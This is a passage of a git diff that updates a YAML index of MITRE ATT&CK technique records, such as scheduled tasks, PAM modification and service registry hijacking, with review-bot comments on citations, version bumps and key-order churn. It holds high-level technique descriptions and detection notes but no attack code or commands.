+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
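Review bot: the new closing sentence of the T1648 description cites `Cloud Hack Tricks GWS Apps Script` and `OWN-CERT Google App Script 2024`, and those source_name values have to match external_references entries exactly or the citations dangle; the matching entries are added in the `@@ -27303,6 +27680,14 @@` hunk of this record, so this is consistent. The `x_mitre_attack_spec_version: 3.2.0` inserted after phase_name is the counterpart of the 3.2.0 line removed near the end of the record, i.e. a move rather than a bump.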
@@ -27268,16 +27643,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
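Review bot: the platform rename `Office 365` to `Office Suite` (with x_mitre_version 1.0 to 1.1) changes a value that filters and per-platform index generation may be keyed on; a literal match on `Office 365` will no longer select T1648, so check whether anything in the build matches that string and whether an `Office Suite` index needs to exist alongside or instead of the old one. The added `OWN` contributor lines up with the new OWN-CERT citation in the description.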
@@ -27303,6 +27680,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
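Review bot: both new references carry `(n.d.)` as the publication date even though `OWN-CERT Google App Script 2024` has a year in its source_name and both were retrieved in 2024; that is inherited from the upstream ATT&CK data, so nothing to fix in this repo, but the two URLs are worth a spot-check that they still resolve, since a regenerated index inherits dead citation links silently.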
@@ -27317,29 +27702,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -27352,25 +27718,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
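Review bot: `x_mitre_permissions_required: - User` is removed from T1204.001 and `x_mitre_remote_support: false`, `x_mitre_deprecated: false` and `revoked: false` appear for the first time; the remaining added lines (type, id, created, external_references, object_marking_refs) re-add what the preceding hunk removed, so the net change is those flags, the dropped permissions field, version 1.0 to 1.1 and attack_spec_version 2.1.0 to 3.2.0. Same pattern as T1569 earlier in the diff, so whatever is decided about the dropped permissions field applies here as well.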
@@ -27420,17 +27802,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
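Review bot: the appended sentence introduces `Win32_ScheduledJob` and the citation `Malicious Life by Cybereason`, whose reference entry is added in a later hunk of this record, so the citation resolves. Because the description is one long `|-` block line, the single added sentence shows as a full-line replace; diff the two lines word by word rather than reading the hunk as a rewrite, since the earlier text is unchanged.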
@@ -27493,7 +27874,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -27527,8 +27908,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -27537,6 +27918,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
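Review bot: the Cybereason URL ends in a stray `#blog-subscribe` fragment, which points at the newsletter widget rather than the article; the canonical link is the same URL with the fragment removed. This comes from the upstream ATT&CK reference, so the fix belongs there (or the generator could strip URL fragments), but it should not be propagated without comment. The `(n.d.)` date is also odd for a post with a named author.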
@@ -27549,29 +27934,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
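Review bot: the removed lines include the entire paragraph on the deprecated `at` utility ("The deprecated [at](...) utility could also be abused ... though at.exe can not access tasks created with schtasks or the Control Panel"), and the added lines run straight from the Red Canary citation into "An adversary may use Windows Task Scheduler"; git shows `can not access tasks created with schtasks` as unchanged context, which makes the deletion easy to miss. Confirm the paragraph is intentionally gone in the upstream 1.6 text and not a side effect of the code-tag stripping that produces these odd line breaks. The `(Citation: Stack Overflow)` attached to the Control Panel sentence has its reference entry added further down in this record.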
@@ -27618,7 +28003,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27650,8 +28035,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27665,6 +28050,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
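Review bot: the `Red Canary - Atomic Red Team` reference points back into this repository (`atomics/T1053.005/T1053.005.md` on `master`), so the index now cites itself by way of ATT&CK. Harmless, but the `blob/master` path breaks if the default branch or the atomic file is renamed and the generator cannot detect that; a commit-pinned URL would be the robust form, though that is an upstream ATT&CK change rather than one for this PR.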
@@ -27677,16 +28066,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
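Review bot: `modified` for T1205.002 moves backwards, from '2022-11-08T14:00:00.188Z' to '2022-10-20T19:56:18.579Z'. The old value has the `14:00:00.188Z` shape shared by other removed timestamps in this diff (T1569, T1133, T1546.006), which looks like a release-wide bulk stamp, while the new values look like per-object edit times. That is consistent with the generator now reading a different copy of the ATT&CK data, but any consumer that treats a newer `modified` as "this technique changed" will now see regressions, so the source switch should be called out explicitly. The Stack Overflow entry added above closes the `(Citation: Stack Overflow)` introduced in the T1053.005 description.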
@@ -27749,7 +28141,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27814,49 +28205,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27871,20 +28223,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
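Review bot: `x_mitre_permissions_required: - root` and `spec_version` are the only fields that actually disappear from T1556.003. I checked the six external_references removed in the previous hunk (mitre-attack, Apple PAM, Man Pam_Unix, Red Hat PAM, PAM Backdoor, PAM Creds) against the six re-added here and all are present, only reordered (PAM Creds now precedes Red Hat PAM) with `description:` emitted before `url:`; both contributors survive too. So the 49-line removal and 57-line addition are almost entirely key-order churn around the version bump 2.0 to 2.1 and attack_spec_version 2.1.0 to 3.2.0, which again argues for a stable key order in the generator.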
@@ -27974,7 +28363,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -28062,7 +28450,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -28147,11 +28534,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -28229,7 +28615,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -28262,7 +28647,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -28285,11 +28670,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28347,9 +28731,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -28430,12 +28813,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28454,7 +28836,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -28468,7 +28849,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -28495,8 +28875,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28527,7 +28907,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
